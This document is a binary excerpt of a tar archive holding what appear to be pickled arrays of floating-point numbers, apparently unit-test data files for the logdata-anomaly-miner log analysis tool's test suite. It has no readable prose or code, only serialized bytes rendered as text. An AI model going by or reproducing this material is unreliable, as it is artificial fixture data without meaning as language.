9G?5G?(G?;Y~G?^,ХdG?4=dG? IG?"2G-G?胤40G?#G?ⵋJ~G?"G?~ >XG?X ^G?okTG?䔁ڮkG?%{gG?j~rG?4G?cg]$G?f/pf4G?C7G?HSG?HG?b|JG?.iG?dtG?YDW:RG?%FIG?*"LG?S,@K?G?$0G?ѳwfG?ʛlG?*OG?hieG?B9$2G?exQmG?ӕwG? G?@ucG?oڨG?鑍AY}G?N}T $(G? }G?hGSG?P G?"%6G? WG?̣ 5G?2G?HdJG?9lQG?(ӌ1G?Ꟙ69-G?cG? /e;G?U`G?[?G?OTVG?졝 G?9az4G?1G?uG?E]TG?R=G?L&@'gG?#&nZG?8JeG?n!LG?@"G?{kG?f@:MG?䜐# ,G?6eG?< G?=qG?Bzo>G?42%yG?ǕG?& G?"G?2 G?}G? jG?ZʤG?;OG?`$*G?TG?)G?NG?pM[G?**$IG?4G?~̈G?@HG? EwiG?56@iG?ߨEGG?HeZG?:!fG?U;؊G?ܷG?1~)G?[=G?ꤻ"G?Jܞ?G?qG?P/G?*tL^|G??8vG?@଼dG? cb{G?9P*G?[G?Td4#G?:"~G?ntEvG?b.pG?b8|4G?7hZ7G?'?KG?--G?UݧG?[1_xG?R@G?񼄞yWG? yQG?۪d%>G??k ZG?K^tG?х)G? $G?ǮG?I4BdG?HX G?{{G?팞yG?G?%߶^G?-*_ǛG?GG?#MG?= wG?t*tG?ѧG?auMG?sj]4@G?2G?QЇ;(G?䋍X[G?kG?"LG?wx;G?ԗ>G?䗹^G?$eG? =#VG?,G?k‘G?`G?"q OG?'CsZG? 5V*G?x, s\G?n:DG?}"G?k ;HG?ۙ^mG? mc=kG?DDG?fG?ÎVYLG?DBG?⻑2gG?+7eG?qI{لG?4I5G?FG? sG?êG?]*G?gxáG?E$G?|rG?ߎ*pG?mnꄚG?2fkG?8E*G?:vMPG?o&(yG?Hi\G?eG?⌺9G?:НG?aVǑG?lu36G?XBeG?fG?wY|AG?1̀YG? '-G?E,G?d* G?h.G?JjG?ٮG?&C\&G?lpG?ICtMG?c- G?s3e8(#G?HMOtG?_G?bZ~VG?3KoG?9SG?ӹG?~G?kJ+G?C3BG?ܬG?b(uG?AC{MʒG?kJG?5u/G?nK G?~PDG?:G?a=hG?⮰G?MKhG?PEG?WCG?.G?vaG?鏉G?G 8G?X$4G?A.G?6M &G?umЭ2G?9छ4cG?fBG?ErgG?^Bs4G?PmG?_"lFe](KKKKKKKKKKKKKKKKKKKKe](KKKKKKKKKKKKKKKKKKKKee.logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/vtd_data/beta2_data_test7000066400000000000000000000647021437606560100275330ustar00rootroot00000000000000i](](G? ڱBG?~`*hG?G?\pDG?d;?G?⧡iG?^G?WHG?S%G?0z;G?fbG?ʦqG?uv9G?GwbG?,)]G?)c!G? 
bVJG?7@G?X4G?띆 aG?GYG?snG?b2@G?4EG?QG?>n i9G?mMkG?1|G?*/G?U9G?;vQG?vLDG?CUB˵G?@.3G?l(hG? (OG?r,?IG?&YG?|GKG?z1&G?F3,G?;80G?FkG?AX sG?Lmy G?'F@G?hSe4G?tkWG?p5"kG?`rOG?殹aڲ G?k5!G?i 困G?9gfG?ƺAG?Љ#ZG?h'4G?9ѽl1G?YhG?A< PwG?[NG?$_G?F"YG?6G?SzSiG?ZvNG?=sG?ㆼf4G?-VG?&4E\4vG?KSG?7 qG?ZG?R7BG?KNG?51G?*cޅG?\v!4uG?'+PwG?ދ G?Y~/nG?꼡k7sG?xexG?TR[G?d4И]G?;G?Ѣ.WG?G? 5G?@G?DC7G?rnjG?nEleG?DhkG?9:G?E[*G?twG?no6G?%'6G?SOG?h);G?c?ՌG?~G?}OG?6]X%tG?0soG?tG?hv G?qG?G?[&NG?4*G?zaG?{G?)G?ɸpG?EG?S>ޮG? 0~G?rkfG?6G?R{G?Z}FG?5)SG?;\şG?5G? ؆uBG?%CG?澡 G?쁳G?}(sG?2u+UG?tΊG?!>G?ݦd)G?EoG?1  TG?F=G?-eG?VL3G?#G?֝G?| 31G?Iӳ}G?ъ PTG?,,'G?验-bG?qG?R'?G? ?SG?`TG?9G?恼G?H ukMG?Ti}G? ~efzG?ts UG?G?K1G?ûG?zjQG?#TvG?]/0G?1aȉG?m1^G?sz}G?嗔GG?'oV7G?}#o_G?dVg1uG?飅G?5ʐWG?SD^G?ڡG? G?!{XG?de~=G?\G?ʜG? G? ( G?G?o~G?.KG?NG?C{oG?O>G?y3G?:XG?u LG? MG?(G? G?}OG?➘G?N:G?;G?oG?84G?kӔDG? G?<%G?搢$G?vtG?_kMG?:H!G?ª".\G?>G?%D G?բL'G?B$ `G?Pؿo+G?c\GG?-dG?C)+G?/^+OG?GȦ5G? UG?qp/ G?"G? G?a׺>*G?+Y 5G?'vG?깔uG?={4WG?zKvd4G?7>IG?BZG?8;1yZG?RJUwG?h4%G?ه&ae9G?߷G?gG?3*G?&_^~G?҆ϬG?zG?apg+G?G?WXkG?ۈG?2\sG?LiUG?/(xG?)T_G?ׯJG?ڵQ\G?G?-zkG? %hG?\JG?}#?G?嘵G?73G?TRD"XG?w(šG? 8G?[3G?@LG?DG?8R G?㞺=xG?PG?UKĐG?d8G?g<&G?AG?5a0ЅG?s9WVG?8$\$RpG?`o{G?G? _G?߰JVhG?7x,G?L|G?;GG?`^Q@G?"5MG?,gG?+ G?wG?(G?^^GG?؝S*GG?޻_G?`G?}loG?4s`G?ԸQ^G?mwG?͊G?~j!G?$GMG?DA #G?}4G?T8[G?4i<`bG? {,QG?,cG?ٞ/G?TSfwG?xG?Ef$9G?_cG? SjbG?OV3G?ԌG?QG?|52՛G?_tJG?e/[G?67FG?;bG?{G?wG?+ةjiG?}6}-G?IG?aG?kkHG? G? nPmG?aG?I6ޢG?dajG?G?{zG?l3G?xŬG?6؏lG?$rBG?\st.oG?8 tG?4]G?`~tG?^QG?`MyG?QFrBG?@?G?PFG?N,JG? G?:/ZG?A{G?1 (RG?ݫ*f^G?滷#G? a/@G?QJPG?Yn5G?^PG?CA]G?.ȑG?uG?+PBG? 2AbG?yRaG?N"qG?j*>G?B:NG?-=G?bG?yG?謨GNG? uIG?#*ؒG?>&G? rG?0G?2pG? G?2<%G?\HwXG?jXtG?ՠG?G?u#ҾG?KjLG?`G?(` G?u0G? ,G?hG?{渓G?NuaG?: G?hG?)* G?P?G?YgȇG?EG?G?X>nG?ꖘQG?h`G?詽ňG?cȥXAG?*|kG?G?)R/NG?袕y G?}5OG?}D[G?B y]G? 4WG? <\G?̝G?;`:G?S_OG?]_/G?&F!G?]BT(G?l-G?BExG?OKG?< خ,G?stpG?|G?P`MG?Ne,G?''*G?}G?{jG?$(֒jG?~05G?Fo.G?duG?DOG?jR*AG?{aG?ma_wG?ʒ{yG?VAG?yGLG?Ꮏ~;G?`^n5G?G?Z1!%G?apq7G?cIG?ŽE G?a4oG? 
j6G?U eG?;\m'G?qWG?$ 9_G?`RfG?ë%G?5G?ymG?@uG?IG?UFG?J$aG?~{)G?ZiG?xT3G?G?U ^DG?[FG?s{0}G?eL l]G?D7eG?UG?])G? 96G?%5ݴG?b:yG?)_ G?z/7 G?e G?T aG?6eĤ| G?UG?⊶G?oّG?SG?>G?ݓ703G?*%?G?OM]WG?6FG?3~<_G?M98G?x*bG?xAG?K G?0KG?쒶S@G?鎪G?іG?0yG?\;G?⸚4`G?išG?οBG?鏐Ӣ-G?0{;G?!Y -G? 䩗MG?\G?bؤWG?S]LG?trV G?MJ=-G?ye^Ae(G? G?#X^G?jkG?sɏG? 뜤ʆG?9\$G?oe+G?>G?xͳG?tTBG?G%IG?n}%G?])*KG?˦P,G?$u8G?Zg;G?{~vG?0ހPG?RvG?kG?P}xXG?:G?;:DeG?G?\,&G?&FG? DMNG?G?yG?YkG?0G?aN|G?(G?-TIG?ys4IG? FG?C"m0G?`h}G?58.G?ȱ(,G?\G?)(0G?GG?ls'G? 2G?k&G?aG?CG?G?Uxh0G?#`G?ۂ~MG?/0VG?҈)G?ԩߒvh G?~&G?R$7|+G?c(G?Qd8G?/G?jIHG?Z~G?w|SG?mWG?(W2mG?̪mG?SIÜG? T-{dG??-=G?f$;5G?麨t^!G?|f>G?"zdG?댞1DG?YG?g@RQG?偂LmG?U SG?g޷3G?RG?枣@OG?|G?%%G?zG?~!G?W'&G?3yG?ѺG?MG?UwG?3LӏoG? }|)fG?ş G?ɓ|=G? G?@I_G?AG?fG?= ϋfG? ÐG?/:nG? =G?VG?㙝%G?G?IG?Lz-G?1 G?jG?IwG?شeL7G?ꐯG?<\3G?cG?P!4G? IvG?JF0G?sG?*/91G?.B)i5G?І)K2G?#TPG?ŕ G?$G?mG? m9G? vG?K:(G?X 秽tG?]G?. ],G?PmKG?꬯G?틕ۈjG?Y2NG?G?{:۱G?ܔg$G?J?G?]G?zJG?ɝ$7G?G?H۪G?|+X) G?K+G?띪eįG?bၮQG?h G?Z#G?WG?AWuG?k' G?AeWG?rB+sG?U6G?iJG?멇 ŬG?B儱VG?j'G?( RG?7[ HG?kbXG?>KG?랞+k!G?yG?A G?憐޵G?vOG?sYFG?^G?BdG?끒bG?E vG?$ezG?%|[G? }5nG?=R|G?>{G?fMG?OG?]w+]^bG?>ԯG?!,VG?]/G??HK0G? 9G?y4G?=!0SG?o%'G?<%%G?38rlG? .COG?f#G?H'G?kgd`/G?F|`G?#IG?cwXqG?臎{|{G?.G?Օ23G?fH#G?7F:G?H* MG?DG?eG?sG?!"G?Wsn%_G?.]G?]JG?ږkVپG?G?F 2G?Y{QG?E{G? ú|G?:m?G?-f-G?<5RrG?$GG?)(:G?T|m?G?ퟝ#MG?(q8gG?sUbmG?KsG?P}K[VG?|CHG?*ǣG?w٤Ɩ$G??͇qG?է0MG?mPG?]pG?yG?.>nG?\y%G?d G?>ce(G?ٻK !G?6G?h9QG?GG?*G?2~4ZeG?hggsG?&G?gTi6G?O;LsG?$%G?盐{)G?Y uG?^s[G?!u{G?4e%G?8{nG?;~G?aSG?N&KG?̆?RG?_G?6#yG?Vu1FG?2G?WTG?J G?C2HwG?|,eG?&G?,qѻG?'F'G? SG? ݾtG?+BAAFG??tgOG?ශ0G?Z*8G? OyG?.G?0/G?rjǛۿG?E#)?G?ф(.G?!}G?,9G?BIQG?zX'XG?E1~G?IT G?#犠G?fŇ@G?݈,HG? G?y=%G?닼kG?DJ@HDG?ćG?շ$G?炈xJG?*˷G?uG?jTG?ŷ}>G? =i8G?9W'G?BG?B+=qBG?1He`dG?]G?lfȃG?IE:G?pG?¯QG?2RǧG?+x#0yG?NiG? G?<G?>WG??G?s8G?T 3G?oG?pMG?Z4G?;q9`G?O{IG?6G?i5G?km*G?QgأG?#|G?G?䏾)G?GpAG?!$2G?$گ&G?+.G?|NoG?˸]iG?_tG?= lG?UC硗G?{%G?ʊCG? 
L4G?iߜG?nG?=G?`*xG?[^G?Bq=G?:g)G?N{֧kG?o G?1uG?4uG?צLMG?aG?,NG?G?隟CG?ȸpG?[[uG?m?'G?yT nG?ZG?Tpi7G?y}qG?qھG?(3.eG?uh_%}G? M`vx'G?Z/G?(,:?G?U"CG?h,JG?їO0G?гIG?wG?u3|9B4G?/ %_aG?mnJ`G?p)EG?bcG?A VG? hG?ARG?M9)TG?%'o0G?ݪG?겫G?˸GG?هîG?㡋iG?)FG?j+"G? G?+vG?GunTG?VȥG?վP 3G?Ǯ>3 aG?@!CuG?K+@wt6dG?LG?F#iG?B"?G?/WG?Yf^\G?sKG?'J0.%G?WA!G?\/YbG? )t'G?5&>}7G?3˂G?I&?G?u|G?Q&[!G?8koG?L fCBG?̼G?G?fPG?dKG?V_1G?_A?G?Ø7VG?Cʒ;}G?WG?fZ|,G?G?޺ǼG?N$G?߳vT:G?/G?U_G?o!+G?tϔG?*l}GG?\]G?*aXG?8G?$G?ݨOG?꛰ G?TQ\G?K{G? G?~+IgG?S5LG?h:#G?r7G?G?S<}(G?VP|G?>UGG?[QG?zǭG?\^eG? dG?9p@G?uG?gaoG?zv9G?AiG?\oG?Wn[_G?9~Y~G?~G?濴o}}G?EQPMG?JG? UG?棚G?txG?a#G?n׏G?弲G?xfHG?+?@G?Rn%PG?lsMSTG?+G?*G?7+G?EXG?G5G?G?%lG?^ l$G?JJ^G?n4HKG?>G?u?tJG?]:1|G?΃K%G?]sKG?]7/CG?~jG?8\XG?5" IG?A+G?c G?B'ՔG? :G?̝G?vFG?칠G?G?KAG?rLNxG?ޘQG?1c|G? G?5+G?  rG?޾G?tS\cvG?hcF=G?q^G?/"G?AgG?嵰F(G?$k ~G?3zG?Ak)ϘG?/e6G?уI?G?fJG?^iG?iS4CG?ݗ?G?,ACG?炻_ηG?|qc'G? chG?Kb&uG?KzG?swoG?%G?8ccG?fjG?/G?ڣg[G?SxqG?.; G?G?\[G?t>2 @G?LFRcyG?H`J/G?tD)G?PsG?GSG?~nG?svnG?:G?衛1G?oG?+S5G?Ɍ6SG?08LG?LyG?SG?;0G?hՆG?[/G?u3G?muG?0\G?Z;.G?)j04G?떄#LG?K=G?K3-G?0qG?esd_G?ya'hG?G?˚DG?G?%G?%fDG?{m&G?!G?;f>G? .G?67G?b ;CG?bSG?)|,G?ㄋG?ZVG?[UG?xokOG?yGG?H9G?`*G?- vG?=mG?ŃEG?r3ܧG?# G?۔Җ G?w|G?Uq`G?$#V_G?}ШsG?AwG?ݑ(yG?#[G?Sg0_G?f64G?ǝ^ɗG?aG?TG?vC>G?}FG?:G?e{G?{SG?HaB5G?ƭG?x%G?/G?'IZmG?>FCG?+\7]ݠG?䌻[G?wG?3[`G?84XG?AjJ G?>b6G?ΪDF G?5#]G?H#2G?碃G?%G?hv/G?nsOG?=#ŎfG?@7G?)e~G?{ÀG?胇-G?+.G?&QRG?쎻5G?BkG? G?; ,G?ExG?1ӱG?}&7~G?_v>EG?EfG?)G?'G?⻍7TG?bG?h>G?J;G??~G?Iw ǛG?TG9G?l$G?@$G?[*UG?녏ԼG?0PG?呈ZdG?º)G?G?D_ G?eG?47_G? ^G?idbG?,G?ꚡ. G?e\>G?f>7WG?Ifp/G?Ni8G?PG?ߣʤ_|G?`X&G?m; G?xےilG?G&pG?T1G?uR_G?ڦOoG?$puG?ЩG?(\G?nT%G? 'G?Ok-gG?dJG? iG?= -G?/`-G?CWG?NG?M-zG?G?) G?:G?&yvG?2VIG?\ЮHG?2TWG?PB>CG?ϿwG?J`G?a,\G?۷f~>G?[JhG?B .G?[G?Q }G?ڿNG?ꫡqžG?B0G?r?pG?cUG?4HqG?9G?dG?~AyG?3YG?2OG?M?G?!Е;G?NUG?ދubG?皶IG?؎G?-h G?]^UG?vG?~:eyG?l,G?G?<@>G?5G?&ه;G?շ9G?u G?K {G?<$5G?G?,cQG?žG?Y;Km'G?h6G?:]fG?,A֙ G?UXG?$VG?{G?ᛶ G?ցB_nwG?[IvG? 
QBG?u΀G?AG?㻀LG?NG?AG?~[G?|ˡeG??eG?NQi5G?j<nwG?rXP'G?'"G?۟[ G6G?L 9:G?WG?8v,G?iG?2G?<;G?x{xLG?Đ2[G?6/G?g̨G?LH )G?_G?r G?SG? G?M @G?7xSG?G?Ä2 G?*OKG?,`/@G?LpG?᧱;%HhG?eG?Dg:1G?fUG?ͭG?-&fShG?}KG?ZgG?cvɩ'G?zG?Yѷ~1G?ߞiG?& G?TWqStG?<[ۋ!G?G?c)7G?lC|G?y`ŔG?.9G?/ukG?}G?E40G?_IG? 88G? 5GG?%^LG?C&G?oG?d6qG?uvBG?qGMG?T`G?qG?aoG?9ZKG?铜zG?4EG?S+pG?; G?&[G? -G?};G?p,yG?-Yx)xG?߾߸G?۪cF^G?I'-G?h6G?.G?BG?@avG?/G?mon=G?뚨wKG?n-o3G?]ЌvG?nLD+G?rex憾G?YG?_$QHG?wl`VG?~4!;XG?9G?Jl 2IG?Q;7G?2G?Z‘iG?uG?^Z G??sYG?}B G?{h U G?㖠G?ddIG? +\&G?w2G?RDm}G?", ֫G?QG?ɖ>dG?[^>G?hc_t^G?yx8G?? ~G?$CeRG?]'`G?G?&G?I~3|G?:ṖG?[qG?iWG?bN_1G?L"k)7G?疊qG?օjDyG?p=DG?NG?羴\&G?VuG?7>G?lO'G?߰w[e](G?t G?ߦ3G?>=َG?,۞IG?r~G?} :4G?ӵG?uNa7G?9dG?ަG?l<{H G?p쁉G?ޡtykG?뭱.cG?_8ʄrG?7NigG?鋹G?|4>G?$WG?CtG?) AG?6,zG?@G?ɋ)oUG?"G?v,܇]G?郈-CG?6>kjG?G?3$Κ*G?N}j_G?ːZv G?z*x=G?菨5G?pPZºG?wstG?qѧG?귤MlG?'pG?i@G?N8G?BG?m@G?K$G?q/kG?a&G?}5L4;G?%4 kG?+sG?xgzG?ѽ{G?c}+!G?Ӱ]TG?q(G?M~G?(#G?눮SyvG?&lG?]4#G?U G?YFG?MG? G?QG?t9G?:,G?rjIG?D*G?xvG?ï3,G?Aʕ羿G?S DG?ϬVv[0G?cG?}S1G?싄ȽG?쵰G?Ȳ7G?8MG? HvӓG?Z3OgG?q3G? qG?ᒢpzG?:W?G?F[@G?ڂG?:tG?̏uPG?)ٙG?:4"ZG?sf5iG?XG?膜ܚ^@G?HG?mL6G?GZ;G?YG?B\G? ǰG? ]G?{:( QSG?yJG?N2G?1*E#G?TݞG?p#G?1PCG?7G?ћdZ&G?톹6`G?5G?ΒsPG?0 sDG? G?MfY=G?'fG?5G?P|{G?ذ$bp;G?ʯ1fG?m3(G?$ifaG?ݏ}G?YG?t(=G?}A G?k7OG?"DQKG?SbVOG?LϬIG?ޕT,G?ÕG?KaHMG?)ѣG?poEG?#VtG?'G?i2*G?1G?M1+G?YZG?mEG?I"?G?`G?zUpG?cdPG?8b"G?iE)ZG?Xm{\G?- i1jG?_3u +G?zbN; TG?›eG?}yG?(>g1G?oj? G?E$G?]@1G?儜G?wݮf2G? G?⎖֪;G?t_G?X G?$_&c.G?"G?O?bG?0G?BG?ϼmG?3/U+G?̱G?yl^G?YG?$G?ℜ(G?0z3G?KG?15lG?X^/bG?xو}G?)LG?$G?¸*G?CbdG?㹯)G?3옢$G?up\G?ujWS[G?!9+kG?waG?ͥG? F G?8NIG?W[G?.wG?K!G? 0ݟ9G?VHAG?|X{G?D߬G?,reG?EG?5 nG?4+IG?TN:RvG?L1G?WD|G?mϟG?CG?/)$G?au$nϾG?Kk]G?m՞G?}ggDG?XڕG?RSG?SlnG?A7G?3jG?SГG?5=!G?pnG?;G?٬շ8G?twG?IO\ G?U:G?؁G?ɖzMtG?i +G?mBG?ݴrG?VM1NG?qZwG?<)G?5l{}G?G?G?ˏG?cG?7eN.{G?UQ}G?@ ؞G?ܖdG?DG?T YG?xðNG?瓬6YYG?9pzҠG?uǼʪG?0߯AG?RPG?樊A^G?sG?쐥-G?mG?W2G?J!^G?ަ^gbG? iDG?ܰ \G?4QyG?brG?wP4G?lOtG?놼1G?> ҖG?꫇k64G?>5G?꾧WrG?囪+WG?>#eG?lN_G?9[G? ^FG?4m%G?㗴OzG?FG?MmG?rVG?!nG?1طfG?]-G?WpzoG?"W6G?]wG?[3Bf G?LUG?q? 
)G?xF9ߗG?]KG?邗UG?*l{iG?䘦UdihG?⼪e:rbG?ؕ*`|MG?%G?5sG?Q ]G? r}G?CX4G?>A^pKG?=dG?Y?AoG?iHc2G?ԕTG?QWG?܃ZG?Ml3G?\vG?,Y -G? +G?>z'kG?阳3G?v4G?HOG?'z AG?4xbG?ԝ6G?굽|G?@bG?m9G?>}G?轣'G?cG?U%G?n8`G?ى|ڻG? θ0G?Q6G?)AG?1G?F#U{G?G?㳫Ä0G?TG?G? gFG?̊ G?;tG?Q !G?WG?ЙzG?:6<G?Rq G?c.;B`G?`z7G?LϫaG?s@*G?uxG?6\qG?XG?vs}G? \G?ЖZidG?PzHG?V3*yUoG?^o-xG?lOG?SG?ǑJbG?O¯hG?%tG?dG?q46G?vG?VeG?#G?8\G?DT2G?L/G?yG?vpG?/ G?em0rG?F0hچG?+iG?I+G?u}qG?͐G?5k7G?]BuG?(=?܆G?7X|G?->bG?f&WG?otG?s)G?DVAG?l-$A%G??7G?̚K G?`-G?5p _G?5I.G?IjhG? G?}zuf*G?-zG?dE7G?+fG?;G?S~7G?Dq!G?eG?Z`QeGG?,G?랉ۣ5G?"4i4G?{A"G?8˔G?RqG?X-RG?H,NG?Ѩ'ːG?;%VG?G bhG?̙}Ry;G?iB\G?iG?^@iG?bG?1ùG?zVG?zXEY=G?33G?=52G?tjxG?.k"G?s/D \G?ڌ˿G?-tjTG?G?).G?[%G?$G?u~ɩG?yG?yJjRG?]`G?ݷ𐑾G? DG?ۣ&8G?+J M*eG?d(>PYG? ORy`G?vG?䃔f kG?౔kG?ꡋ~oi:G?J\G?| G?&G?&RG?rlaG?IG?G_G?E0SG?|]|}G?LTG?xG?]o G?N ?G?r]JG?eGG?jeG?=G?済Z}G?GšG?SYbUG?FoG?9(G?D{}{9G?>v G?ng] G?9揹G?R6G?]$G?)P[G?I^&G?HEG?Q8G?L{G?^M`G?8G?ܽѬdG?@G?6FqG?QG?siÔoG?Љ3iElG?%}fG?UG?kzbG?׮ZΣG?L,Hw9G?=BG?)`.G?OV5jrG?;IG?RzyG?g&ilG?[A.IG?rG?`OG?lW}:G?;.G?yLG?-i0G?H:G?xG?1H.G?DG?J@G?f`G? NM'[G?K2 G?WG?+G?(tG?2ԿwjG?ጽG?,VG?;jW+}G?n]xG?hG?٘G?䈐S&dG?igsj8+G?4KG?RZG?jyG?ؚ$G?ݮBG?x-G?e62G?xKG?hIG?OvrG?OG?篘G?\B(G?zkLG?OOG?$kBfG?ݽ!2G?JJG?(`IG?WBZG?ƀG?^>*G?άBrG? +[lG?f AG?0'@G?W([9G?LqwiG?A̴@sG?ZG?8ӮG??0FG?"G?ʼ0.G?սG?Y^#G?d6ȳG?9G?썉/G?d!1ޅ4G?㭎V}G?9wG?ՌG?SWG?G?MG?G[G?ٌG?:ث;G?ny;\G?5G?YY$G?#,G? EG?ItJG?+G?"U;VG?ߩ%HG?䶀Lj2G?ۉWG?X`G?ȬG?ѺPG?|G?垡!SG?t; G?c]G?bXG?ғ"cG?6DG?hbG?bgEG? G? wG?.)SG?tiG?a"nmG?}G{G?,G?5uG? BG?;G?弔vG?wCH@G?͌syG?eG?$azxG?A";]G?[(fG?"+5 JG?ΤG?'G?vG?sG?G?(!G? 'G?5G? e G?,;4G?hG?ݠ]u!G?G?%CG?g{OG?hBHG?EB|G?Ջ}㹘G?G?#YG?DEnwG?0ZhG? G?G?9LqQG?mhRG?'m>G?ݦ5G?G?*9G?칾G?I`DkG?c HabG?XOp@G?飚؅G?ZDB|G?ݠ jG?2q5G?utG?EG?ykuG?繦(G?:t^.G??p>GG?>lVeG?dbG? }vZG?XɎG?;veG?8=G?UG? /G? 
d@G?ٷ`r)G?PPG?: GG?ӻqxG?LG?( cG?ޖG?u`A2G?ګJlG?>nNxG?뷤.rG?G?n+r+YG?rI G?EðG?"B6G?4TG?ZDKG?X:f G?pG?2qG?4tfG?6 G?kb@G?A3G?N KG?P:G?9r_[FG?AG?]DwG?/EG?GG?[G?_)yG?蘎qd G?:%kbG?O`G?{,FFG?nhoG?"|WG?5ERG?qarP(G?D׳G?P>CG?Cu=J G?U}NG?蘘l=G?~k(sG?60^G?{&G?LbG?X4G?G?'\JG?UJH&G?_G?tEG?2G?f/G?F,G?=ڨMtG?4~FG?3G?VG?vG?& :PG?G G?z1G?$n G?V?^G?[ vY&G?k"KG?:'G?`L}G?G?L`$9G?(c1G?]qG?n5G?2- G?(@jLG?Wv bG?)j}6G?`1AG? &G? J/;G?I$G?儡r1G?S G8]G?6G?b~|tG?Bڨ!G? 'G?a,&,KG?*pG?i.G?ˤ9pG?YG?!C+G?h |G?C=@G? =G?,x4G?4PG?ԑEG?AgĶG?y G?PMG?VnG?ʋ 1G?~e](e](ee.logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/vtd_data/beta3_data_test3000066400000000000000000000432761437606560100275330ustar00rootroot00000000000000F](](G?ǡD6G?.mϥG? 7N9G?JZCG? pyEG??oG?8G?yd&%G?1x/G??83G?ԸJ-G?ĢuPG?I`G?܏G?mXG?շ;G?7U'G?ʚYPG?eTn1]G?U[JG?s˛sG?,6̮G?1YwG?٪-Z[G?Pw xG?=ڷ*G?pmzG?ȜdG?$YG?QG?MH%G?R< G?QEG?gC!G? r)tG?òm\,G?rNG?_G?w4ȽG?;G?o@O2lG?͂dVG?\JG?2|G?|G? u˞`G?"AG?[. G?`IGG?>JG?чMoG?˥h.G? {<G? Wj)G? G?dh 4G?v:G?8p0=G?ПDÄG?X,MG?ť;_G?͚TG?gkBG?٢մvG?Lr6G?̺hG?כYG?J.WG?+4GdG?0թG?HeڲG?"G?7x9G?Zڪ| G?|7G?5;sG?% 4G?˭G?`G?ٺTOG?͙fG?Km?G?\}G?rz:G?~kG?c#|"G?:%bG?Ʌ-6G?#G?hL'G?R:U7G?G?ȍ0w=G?e= G?.G?QqVlG?:{%KG?g!1MwG?8,hG?8G?|#MG?vqWG?62Ñ$G?Jz~G?ӠtRG?#\G?0~VG?CvG?Ǥ(G?ŻPG?m G?x<9G?6G?ɋ0G?n&rvG?G?nuG?턆ŬG?:b3& G?ɓE@G?~ͬG?/lyG?pG? ݤ G?WbG?ԂqG?dʟRG?+G?اcG?eZJHmG?ɁOG?U G?k 0G?G#v TG?豸UsG?1 G?&G? `G?P|«G?0#G?TsFG?"?RG??VmG?G?;j.G? \lG?65tG?$  G?}U!G?Ë:!G?AJG? MN?G?7ݥG?||I)G?B7$؀G?ԓ'eG?}l7G? iG?r1G?XOJlMG?P*yHG?lr _G?܋cG?Va}G?hRG?9G?{ҦG?KG?ү% G?5G?=vN?G?㳫\`G?XG?ĐbҤG?e7G?&gG? ]ΎG?%WG?NmG?g΍ G?WG? $G?>2G? tlG? SgG?woG?޼6:G?3:G?L!&G?i!7.G?݈,„G?DVrG?v{lG?_;CG?KÔG?v2sͧG?ذkzG?,%^G?ͱKG?"bG?=ONG?6"JG?^[٫vG?Ta3\=G?кg|+G?o^s{G?ԽnG?!{G?ԙM*`G?ٗ^G?@0a:pG? 1G?<G?ם G?+fM&qG? VG? G?֮;G?r~G?[ɂG?ֽRÞG?D54qG?~nG?P2G?YdAG?ݯ G?ǣG?9hG?Я\7l9G?WqZG?L1G?z.G?IEo G?vEWG?"G??"G?zdcG?܎8ԡZG?r"G?~NUvG?|xG?nbG?2K"GG?L @2G?? G?p؇;kG?*c+|uG?P]G?"G'G?bG?Έ`DžG?,SO4G?rG?L5$4~G?7BG?=G?,yrG?g@G?ä00G?yuPG?G?5uVG?̸yuG?op9eG?e>G?_!G? 
qNG?ZH>G?ytzMG?L*sG?|$PPG?PsrG?pG?ڝw.rG?8G?@YG?"2)G?'ġ~G?ж+G?G?VQ9G?\L'G?ܒrl&G?rVG?I.EG?ׅ5G?5y_G?ى WG?LG?ThG?%LTi G?}ZnsG?o G?吇G?y9hWG?s G?/idGG?hASG?|G?BI>7G?aG?~-1G? >G?|%hAG?jG?Q 7G?T[G?": G?5h|G?x6\G?E̽.G?,G?l.G?аuXhG?ƿgh+G?hnHG?*cG?ޚ|حG?guG?T G?[nw'G?ܱ|y#%G?LXG?xojG?QAXG?,}՝OG?(J G?BG?P/G?Ϲo+3G?@}G? 6G?µE8-G?RHG? G?2!G?c<&iG?ѵ G?ԦWG?ί}G?Y`G?NcQG? hG?% ]XG?@vG?e%G?2hG?r{_G?ycoxG?rƢhG?+{PKG?uoG?Ƣ~aG?OoG?/yG?ڐܨlG?֋+OG?yz@G? z ~G?ĒG?ϕ{aG?S6G?ʵ,)=7>G?bc_F"G?u!UG?v`8G?6q9G?oG?3cgxG?ҘﮍG?5Lߞ G?ٰ_1G?ܖ[G?x;?2̗G?k +7zG?f$>i>2G?HלbuG?fG?фaG?zG?G?G?IG?',qG?]J IG?ϻ^G?R>G?YhrG?LJ gG?G?#@reG?i] }G?4ey G?㖏-G?SG?Y,G?.IG?ŋ]ްG?plaG?;ݛG?RR'G?C}*tG?+G?Չt%G?+vzG?%e%+מG?|XG?ѧ~\1v^G?9b(G?MG?ښTRG?Ӗ 0-TG?㮗YG?p"a9G?֑ ÛqG?mG?pDnG?cUOG?8h!ĤG? G? G?]>G?Ɠ`zG?{"G?YKG?G?u=8G?ҥMG?@xG?ѦQFG?Nj G?ɓqd;)mG?jkG? G?Ճ4)G?(z_#G?"G?ݳG?9+(G?\ʕG?w}iG?i_G?[R\G?:׾p"G?<-1qG?[HG?WG?ӥv`%{G?շ2ސG?PG?G?w'G?0ЍG?GlzG?,h9uoG?QdjWG?ɧ G?NLG?FM}G?*O>mG?ӋG?*)G?^]G?xCDG?reQG?*嫱{G?a@NG?9IG?6BwG?ӄNbmŠG?[⋘!G?,t[G?1`$(G?f5BG?6y]G?͔S&NG?`vG?ĸacG?׈QӀ G?_G?$rG?A0G?3RNAG?1LcG?O^ 2VG?iZG?-G?unǡG?ΒFG? vG?>Ŭ"G?·JtG?y={[tG?G?%G?锞G?̖=yG?FG?Q@'g:G?ڿ3QG?ŽYG?-@]G?ښW-OfG?p1UG?9uV,?G?6G?!G?@>C G?3G?Vo.@G?Ⱥ mG?d,G?u`(G?c~6B#G?HNG?"`„G? ʐG?RQHG?ⶡY'G?yR G?GG_7G? =G?uG?nw+G?u@G?`K#|G?˾URkG? ΟMG?a~MG?W,1`tG?i6G?ȝG?&Х;G?K G?KG?0\G?7|! G?ۏn^YG?slG?%QBaG?NkG?` 5G?nG?#D6G?G?թsI)G?jHLG?eSY"G?'G?bŪI{G?i7F]G?``RG?/K\耼G?xcW>G?ᐖiG?;YJG?BG?a!WlG?WVG?2G? 